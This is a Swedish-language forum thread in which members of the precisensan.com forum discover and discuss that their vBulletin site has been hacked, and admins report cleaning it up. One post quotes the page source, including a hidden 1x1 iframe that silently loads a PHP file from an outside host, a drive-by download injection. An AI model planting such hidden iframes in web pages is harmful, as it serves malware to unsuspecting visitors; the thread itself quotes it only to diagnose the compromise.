Allmänt meddelande

Collapse
No announcement yet.

Varför syns inte precisensan.com i Tidigare längre?

Collapse
X

• Filter
  • Klockan
  • Show
Clear All
new posts

Ooops, det var visst Gideons länk jag menade. Hursom, att forumet är hackat råder det knappast några tvivel om:

Is it just me but when I load any a2oc.net page my Firefox browser downloads a sti-x.php file where x is an incrementing number. Causes a new blank browser window to open Using FF 7.0.1 under Win XP SP3

Mvh
    Emil

Comment

Här är källkoden till forumet, och längst ner ligger denna kod:

<div id="footer_morecopyright" class="shade footer_morecopyright">
      <!-- Do not remove cronimage or your scheduled tasks will cease to function -->

<!-- Do not remove cronimage or your scheduled tasks will cease to function -->

</div>

</div><div style="display:none"><iframe src="http://hyundai-solaris.info/vb/sti.php" width="1" height="1"></iframe></div>

<!-- END TEMPLATE: footer -->
      </body>
      </html>
      <!-- END TEMPLATE: SHOWTHREAD -->

Om inte den snutten normalt sett ingår i vBulletin 4.1.2 så är forumet hackat.

Comment

ok, då är jag med på banan. De länkarna har jag inte sett. Frågan är bara om problemen med cookies som en del upplever har med solaris-hacket att göra, det fungerar ju felfritt för andra

Comment

Det verkar som vi varit hackade.
          Vi har ändrat administratörernas lösenord och avlägsnat den kod i programvaran som verkar vara roten till problemet.
          Vi hoppas att det är löst nu men uppskattar om ni håller ögonen öppna efter konstigheter.
          /Admin
          admin@precisensan.com

Comment

Det tackar vi så mycket för,
            nu är det inte så segt!
            Hirvi
            SVERIGE är en del av Dagsnäs Hornborgasjön! hemsida http://www.faglaviksglas.se/

Comment

Och det är helt säkert att vi inte är hackade längre?
              Det är ju så att dom hackar sig inte in via administratörslösenordet.

Ett tips till alla är att byta lösenord iaf. Tycker till o med att det ska startas en tråd om att pes varit hackad. Att alla skall byta lösenord. O byta på alla andra ställen på internet där samma lösenord finns. Mail. Facebook. Andra forum osv!!!!!

Comment

Ursprungligen postat av Gideon Visa inlägg
                - - -
                Sen en tid, laddas sidorna om med sökning efter något helt annat än Pes, då jag växlar sidor eller ämne på det här forumet, vilket syns i fältet längst ner till vänster på skärmen.
                Där står alltid samma sak: http:hyundai-solaris.info/vb/sti.php
                Den söker om och om igen för varje gång jag byter och det fenomenet sker bara på den här webbplatsen precisensån.
                Det är störande och oroande.
                Upplever ni samma sak, eller är det bara hos mig?
                Vet du möjligen vilket datum du först såg den där hyundai-solaris.info-adressen?

Comment

För er som har haft problem med Tidigare/Historik, fungerar det nu igen?

Comment

Ursprungligen postat av Curious Visa inlägg
                    Vet du möjligen vilket datum du först såg den där hyundai-solaris.info-adressen?
                    Jag är inte säker i tidsuppfattningen, men det var nog i torsdags-fredags, i förra veckan.
                    Eftersom problemet nu är åtgärdat, tycker jag att allt har återgått till det normala och blivit "som förr" igen.
                    Det är skönt.

Håll ångan uppe och rulla på med nya inlägg!

Comment

Ursprungligen postat av Legion Visa inlägg
                      För er som har haft problem med Tidigare/Historik, fungerar det nu igen?
                      Jag bifogar bild av dagens besök här hitintills och varenda sidöppning tycks ha kommit med nu.

Och inte nu heller har jag gjort några som helst förändringar...
                      Bifogade filer

Comment

Forumet laddar sidor långsamt. När jag varit inloggad på forumet så vill min hemdators säkerhetsprogram att jag skall söka igenom och rensa datorn.
                        Det vore bra om forumadmin. kan skicka uppgifter om forumstatus via mail vid tillfällen av denna typ (hackning) eftersom man inte vill logga in när dessa problem finns.
                        Gud gjorde några perfekta huvuden,
                        resten satte han hår på.

Comment

Working...
                        X